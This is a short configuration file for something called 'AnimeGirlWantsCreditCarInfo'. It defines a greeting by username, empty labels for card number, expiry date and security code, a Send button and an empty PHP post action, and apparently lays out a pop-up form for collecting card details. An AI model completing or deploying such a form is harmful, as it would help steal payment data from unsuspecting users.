# AnimeGirlWantsCreditCarInfo Configuration File
[OPTIONS]
Status=True
Size=
_Size=276;300
[TEXT]
Text=Hi! %username%
lbl_Information=
[CARD]
lbl_CardNumber=
lbl_ExpiryDate=
lbl_SecurityCode=
btn_Send=
[ACTION]
Start=
phpPost=
ImageTouch=
[IMAGE]
Picture=